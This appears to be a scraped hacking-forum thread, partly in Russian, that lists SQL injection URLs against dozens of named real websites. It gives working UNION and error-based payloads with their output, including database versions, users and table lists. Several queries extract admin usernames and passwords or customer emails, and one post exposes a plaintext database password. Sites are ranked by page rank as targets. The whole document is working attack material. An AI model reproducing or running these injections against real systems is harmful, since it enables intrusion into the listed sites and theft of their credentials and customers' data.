www.tamaris.de/home/collection/shoes/l/1/detail/1 union select 1,2,3,4,5,6,7,8,version(),10,11,12,13,14,15,16,17,18--9/c/1.html?request=1
http://www.mortarinvestments.eu/vehicle.php?id=-171+union+select+1,2,3,4,concat(user(),version(),database(),@@version_compile_os),6,7,8 http://www.emantravel.com/article.php?id=-77+union+select+concat_ws(0x3a,user(),version(),database(),@@version_compile_os),2 http://www.mtg.es/en/diseno_todostallas.php?enid=-8+union+select+1,2,3,concat_ws(0x3a,user(),version(),database(),@@version_compile_os),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 http://www.norica.es/index.php?opt=2&id=-323+union+select+1,2,3,4,5,concat(user_login,char(58),user_pass),7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+test.wp_users+limit+0,1-- +phpinfo http://www.norica.es/phpinfo.php
www.websiteicons.net/index.php?id=-6 union select 1,2,version(),4,5,6,7,8,9,10,11,12,13--&p=icons www.companycoltd.com/company_coltd.php?company_id=f620555555555 union select 1,@@version,3,4,5,6,7,8,9,10,11,12,13-- www.berlin.de/tourismus/unterkunft/pensionen/mirnet/hotel/buchung/anfrage.php3?objektnr=38 union select version(),2,3,4,5,6,7--&p=1&s=de&an=&ab=
для гурманов алкогольной продукции.... Code: http://www.bestwine.ru/index.php?action=product_view&id=-768+union+all+select+1,2,3,4,5,6,7,8,9,concat_ws(char(58),@@version,user(),database(),@@version_compile_os),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+-- version : 5.0.67-log user : [email protected] database : u93285 os : unknown-freebsd6.2 Code: http://www.bestwine.ru/index.php?action=product_view&id=-768+union+all+select+1,2,3,4,5,6,7,8,9,concat_ws(char(58),login,password),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+bw_admin--
честно сказать, не знаю, можно-ли назвать это инъекцией или нет, но вот: http://www.evidenceofhumanity.org/story.php?id=9' в результате имеем: Code: [dbserver] => localhost [dbusername] => evidence_admin [dbpassword] => 53889160Cody [dbdatabase] => evidence_evidence [dbProvider] => MySQL думаю, это самое интересное
Code: http://www.vestidos.ru/pages/catalog.php?cid=-97+and+1=2+union+select+1,2,3,4,5,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),7,8,9,10,11,12,13,14,15,16,17+-- version : 5.0.24-standard user : vestidos@localhost database : db_vestidos os : pc-linux-gnu
http://www.konqi.com/en/read_article.asp?articleid=-69+union+select+1,password,3,4,5,6,7,8,9,10+from+user ms_access
Сайт: http://www.gourmandisedesserts.com ТИЦ: 0 PR: 3 Пример запроса: Code: http://www.gourmandisedesserts.com/class.php?id=-65+union+select+1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),group_concat(0x0b,table_name),null,5,null,null,null,9,10,11,12,null,14+from+information_schema.tables--+ version - 5.0.67.d7-ourdelta-log user - [email protected] database - gourmandise os - unknown-linux-gnu tables: Code: CHARACTER_SETS, CLIENT_STATISTICS, COLLATIONS, COLLATION_CHARACTER_SET_APPLICABILITY, COLUMNS, COLUMN_PRIVILEGES, INNODB_BUFFER_POOL_CONTENT, INDEX_STATISTICS, KEY_COLUMN_USAGE, PROFILING, ROUTINES, SCHEMATA, SCHEMA_PRIVILEGES, STATISTICS, TABLES, TABLE_CONSTRAINTS, TABLE_PRIVILEGES, TABLE_STATISTICS, TRIGGERS, USER_PRIVILEGES, USER_STATISTICS, VIEWS, classes ========================================== Сайт: http://www.doors007.ru ТИЦ: 10 PR: 1 Пример запроса: Code: http://www.doors007.ru/item2.php?id=-252+union+select+1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),group_concat(0x0b,table_name),4,5,6,7,8,9,10,11,12,13,14,15,16+from+information_schema.tables--+ version - 5.0.89-Max-log user - [email protected] database - k0038kze_stroyka os - unknown-linux-gnu tables: Code: CHARACTER_SETS, COLLATIONS, COLLATION_CHARACTER_SET_APPLICABILITY, COLUMNS, COLUMN_PRIVILEGES, KEY_COLUMN_USAGE, PROFILING, ROUTINES, SCHEMATA, SCHEMA_PRIVILEGES, STATISTICS, TABLES, TABLE_CONSTRAINTS, TABLE_PRIVILEGES, TRIGGERS, USER_PRIVILEGES, VIEWS, doc, doc_group, docs_mode, doors007_links, faq, folder, folder_optional_parameters, fo ========================================== Сайт: http://www.mosadharavkook.com ТИЦ: ? PR: 2 Пример запроса: Code: http://www.mosadharavkook.com/store/item2.php?id=-408+union+select+1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--+ version - 4.1.22-standard user - mravkook_yoni@localhost database - mravkook_catalog os - pc-linux-gnu ========================================== Сайт: http://www.northcitymarine.com.au ТИЦ: 0 PR: 0 Пример запроса: Code: http://www.northcitymarine.com.au/item2.php?id=-15+union+select+1,2,3,4,5,6,7,8,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),10,11,12,13,14,15,null,17--+ version - 4.0.27-standard user - [email protected] database - ZR12600_ncmsite os - pc-linux-gnu
5.0.90-community Code: http://chaithanya.org/php/readmore.php?id=-5+union+select+1,version(),group_concat(0x0b,column_name),4,5,6,7,8,9+from+information_schema.columns+where+table_name=0x757365726C6F67696E+-- table: userlogin::userid,username,userpassword,usertype,userstatus and Code: http://chaithanya.org/php/readmore.php?id=-5+union+select+1,2,group_concat(0x0b,username,0x3a,userpassword),4,5,6,7,8,9+from+userlogin+--
пр2 Code: http://davigames.com/games.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- пр2 тиц10 Code: http://gsm-sprut.com/n.php?nid=-1+union+select+1,2,3,4,5,6--
http://www.hdmi.hr/stc2007/index.php?id=-3+union+select+1,2,3,4,concat_ws(0x3a,user(),version(),database(),@@version_compile_os),6,7,8,9,10,11,12,13+from+admin-- http://www.oceanmore.hr/knjiga.php?id_knjiga=-62+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8
Сайт: http://www.netcurtainsdirect.com ТИЦ: 10 PR: 2 Примеры запросов: Code: http://www.netcurtainsdirect.com/item2.php?id=-316'+union+select+1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),3,group_concat(0x0b,table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88+from+information_schema.tables--+ http://www.netcurtainsdirect.com/item2.php?id=-316'+union+select+1,2,3,group_concat(0x0b,column_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88+from+information_schema.columns+where+table_name='phpbb_users'--+ version - 5.0.67 user - netcurtains@localhost database - netcurtainsdirect_com_-_cnets os - redhat-linux-gnu tables: Code: CHARACTER_SETS, COLLATIONS, COLLATION_CHARACTER_SET_APPLICABILITY, COLUMNS, COLUMN_PRIVILEGES, KEY_COLUMN_USAGE, PROFILING, ROUTINES, SCHEMATA, SCHEMA_PRIVILEGES, STATISTICS, TABLES, TABLE_CONSTRAINTS, TABLE_PRIVILEGES, TRIGGERS, USER_PRIVILEGES, VIEWS, accessories, bargains, cafe, cart, customers, customers_optimal, defaults, delivery, deyron, email_list, faq, howhear, inspiration, invoice, linedvoile_panels, nets, optimal_errors, orderlines, orderlines_opt, orders, orders_opt, orders_web, other, payments, product_options, products, products2, strings, tablecloths, test_customers, test_orderlines, test_orders, test_payments, testimonials, tiebacks, typedesc, typedesc_old, voile, voilecurtains, voilepanels, phpbb_auth_access, phpbb_banlist, phpbb_categories, phpbb_config, phpbb_confirm, phpbb_disallow, phpbb_forum_prune, phpbb_forums, phpbb_groups, phpbb_posts, phpbb_posts_text, phpbb_privmsgs, phpbb_privmsgs_text, phpbb_ranks, phpbb_search_results, phpbb_search_wordlist, phpbb_search_wordmatch, phpbb_sessio
http://www.princesscruises.com.do/destinos/index.php?id=-2+union+select+1,aes_decrypt(aes_encrypt(concat(user,char(58),pass),1),1)+from+admin http://sips.inesc-id.pt/projects.php?id=-15+union+select+1,version(),user(),database(),@@version_compile_os,6,7,8,9,10,11,12-- (PR-5) http://www.universal.pt/main.php?id=-69+union+select+1,2,concat(username,char(58),password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60+from+_tusers+limit+0,1-- [PR-5]
Сайт: http://www.retromoderndesign.com ТИЦ: 10 PR: 3 Пример запроса: Code: http://www.retromoderndesign.com/sold.php?id=-7+union+select+1,2,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),4,5,group_concat(0x0b,table_name),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+information_schema.tables--+ version - 5.0.90-log user - [email protected] database - d1479 os - pc-linux-gnu tables: Code: CHARACTER_SETS, COLLATIONS, COLLATION_CHARACTER_SET_APPLICABILITY, COLUMNS, COLUMN_PRIVILEGES, KEY_COLUMN_USAGE, PROFILING, ROUTINES, SCHEMATA, SCHEMA_PRIVILEGES, STATISTICS, TABLES, TABLE_CONSTRAINTS, TABLE_PRIVILEGES, TRIGGERS, USER_PRIVILEGES, VIEWS, retromoderndesign_artikel, retromoderndesign_artikel_betyg, retromoderndesign_conversi cm ========================================== Сайт: http://www.malloves.com ТИЦ: 0 PR: 3 Примеры запросов: Code: http://www.malloves.com/item2.php?id=266'+union+select+1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),3,group_concat(0x0b,username,0x3a,password),5,6,7,8,9,10,11,12+from+go_users--+ http://www.malloves.com/item2.php?id=266'+union+select+1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),3,group_concat(0x0b,email),5,6,7,8,9,10,11,12+from+go_email_list--+ version - 5.0.77 user - malloves@localhost database - malloves os - redhat-linux-gnu tables: Code: CHARACTER_SETS, COLLATIONS, COLLATION_CHARACTER_SET_APPLICABILITY, COLUMNS, COLUMN_PRIVILEGES, KEY_COLUMN_USAGE, PROFILING, ROUTINES, SCHEMATA, SCHEMA_PRIVILEGES, STATISTICS, TABLES, TABLE_CONSTRAINTS, TABLE_PRIVILEGES, TRIGGERS, USER_PRIVILEGES, VIEWS, CoverPhotos, Inventory, Materials, go_access_levels, go_content, go_content_types, go_current_special_categorys, go_current_special_categorys2, go_current_special_categorys3, go_current_specials, go_current_specials2, go_current_specials3, go_email_list, go_email_list_status, go_misc, go_modules, go_online_inquiries, go_press, go_press_categories, go_press_categories_join, go_testimonials, go_users ========================================== Сайт: http://www.pony1997.com ТИЦ: 0 PR: 2 Пример запроса: Code: http://www.pony1997.com/item2.php?id=4&tbl=catitems2&stl=cast((SELECT+version()||chr(58)||current_user||chr(58)||current_database())+as+int)-- version - PostgreSQL 8.1.4 on i386-portbld-freebsd6.1, compiled by GCC cc (GCC) 3.4.4 [FreeBSD] 20050518 user - gt108043 database - gt108043 os - i386-portbld-freebsd6.1 ========================================== Сайт: http://www.listentoaudioproshop.com ТИЦ: 0 PR: 0 Пример запроса: Code: http://www.listentoaudioproshop.com/item3.php?id=53+union+select+1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),3,4,5,6,7,8,9,group_concat(0x0b,username,0x3a,password)+from+proshop_login--+ version - 5.0.67 user - tookd_kwan@localhost database - tookd_kwan os - pc-linux-gnu tables: Code: CHARACTER_SETS, COLLATIONS, COLLATION_CHARACTER_SET_APPLICABILITY, COLUMNS, COLUMN_PRIVILEGES, KEY_COLUMN_USAGE, PROFILING, ROUTINES, SCHEMATA, SCHEMA_PRIVILEGES, STATISTICS, TABLES, TABLE_CONSTRAINTS, TABLE_PRIVILEGES, TRIGGERS, USER_PRIVILEGES, VIEWS, proshop_category, proshop_detail, proshop_filter, proshop_filteritem, proshop_headitem, proshop_login ========================================== Сайт: http://www.concretorecs.com ТИЦ: 0 PR: 3 Пример запроса: Code: http://www.concretorecs.com/store/item3.php?id=-2789+union+select+1,2,3,4,5,6,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),8,9--+ version - 4.1.22-standard-log user - concreto_concret@localhost database - concreto_concreto os - pc-linux-gnu ========================================== Сайт: http://www.newsnetwork-bd.com ТИЦ: 0 PR: 3 Пример запроса: Code: http://www.newsnetwork-bd.com/UI/Public/Common.php?ID=1+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid(concat_ws(0x0b,version(),user(),database(),@@version_compile_os),+1,+70),+floor(rand(0)*2)))--+ version - 4.1.22-max-log user - [email protected] database - newsnet1 os - unknown-linux-gnu
http://www.festivaltv.ru/bratina/honor/index.php?id=-16+union+select+1,2,version()+--+ version: 5.0.45 filepriv=no;
http://rascunho.iol.pt/pagina.php?id=-5+union+select+1,concat_ws(user(),version(),database(),@@version_compile_os),3,4,5,6 PR=6
Code: http://en.fondsk.ru/article.php?id=-2845+UNION+SELECT+1,2,3,4,5,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- User: [email protected] Version: 5.0.67-log Database: u32888 Google PR: 4
Pr 4 http://www.panlarchile2010.cl/espanol/pagina.php?id=-1+union+select+1,2,3,4,5,email,7,8,9,10,11,12,13,14+from+clientes+--+ Pr 5 http://www.taan.org.np/article1.php?id=-1/**/union/**/all/**/select/**/1,2,3,4,5,6,7,8,9,Password,Name,12+from+tblAdmin http://www.diariodemadryn.com/pagina.php?ID=-1+union+select+1,2,3,4,email,6,nombre,pass,9,10+from+lectores Pr 5 http://www.copernico.ch/deutsch/pagina.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10 Version :4.1.22 User : copernico@localhost Server :Apache/2.2.6 (Unix) PHP/5.2.10
Сайт: http://www.danceforfun.at ТИЦ: 0 PR: 3 Пример запроса: Code: http://www.danceforfun.at/common.php?id=-3+union+select+concat_ws(0x0b,version(),user(),database(),@@version_compile_os)--+ 4.0.24_Debian-10sarge1 [email protected] da000113_d4f pc-linux-gnu ============================================ Сайт: http://sports.njau.edu.cn ТИЦ: 0 PR: 5 Примеры запросов: Code: http://sports.njau.edu.cn:8038/common.php?id=-6+union+select+1,2,3,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),5,6--+ http://sports.njau.edu.cn:8038/common.php?id=-6+union+select+1,2,3,group_concat(0x0b,table_name),5,6+from+information_schema.tables--+ version - 5.1.25-rc-community user - root@localhost database - sports os - Win32